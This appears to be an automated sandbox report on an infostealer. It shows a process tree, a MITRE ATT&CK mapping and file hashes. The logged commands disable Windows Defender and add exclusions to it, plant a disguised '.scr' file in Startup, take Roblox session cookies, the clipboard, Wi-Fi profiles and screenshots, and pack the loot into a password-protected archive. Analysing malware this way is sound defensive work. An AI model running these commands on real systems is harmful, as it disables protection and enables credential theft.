      Executes dropped EXE
      PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2276
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:6040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:3736

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:5428

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:5132

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3508

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\Adorins.exe
"C:\Users\Admin\AppData\Local\Temp\Adorins.exe"
1⤵
PID:5384
- C:\Users\Admin\AppData\Local\Temp\Adorins.exe
  "C:\Users\Admin\AppData\Local\Temp\Adorins.exe"
  2⤵
  PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Adorins.exe'"
    3⤵
    PID:2196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Adorins.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:6036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:6008
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:5520
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E9E4.tmp\E9E5.tmp\E9E6.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
        5⤵
        
        PID:4412
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:1468
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5352
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:3928
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:1376
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:6096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'"
    3⤵
    PID:5512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3508"
    3⤵
    PID:1732
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3508
      4⤵
      Kills process with taskkill
      PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5192
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3364
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:6024
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:3492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6008
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:4636
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2900
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5168
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:612
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qbgmakjd\qbgmakjd.cmdline"
        5⤵
        
        PID:2480
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF435.tmp" "c:\Users\Admin\AppData\Local\Temp\qbgmakjd\CSCDF5214CFC0F44F0A877D34E214E5237C.TMP"
        6⤵
        
        PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3220
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1904
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1128
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4616
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5656
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5084
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3196
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:876
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2080
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5320
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:5792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2348
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:6096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe a -r -hp"owenspc2009!" "C:\Users\Admin\AppData\Local\Temp\FykQ7.zip" *"
    3⤵
    PID:3696
  - - C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI53842\rar.exe a -r -hp"owenspc2009!" "C:\Users\Admin\AppData\Local\Temp\FykQ7.zip" *
      4⤵
      PID:5892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr

Filesize
6.7MB

MD5
0d5f5533ea48383187bbd56c0364a8b4

SHA1
a7e9276b6859f220dee17d4b33dd17e89e15dc30

SHA256
47db9f504532cfd200b0d69837638fc81fa3c4c1b456356c8e50b5fc362b541b

SHA512
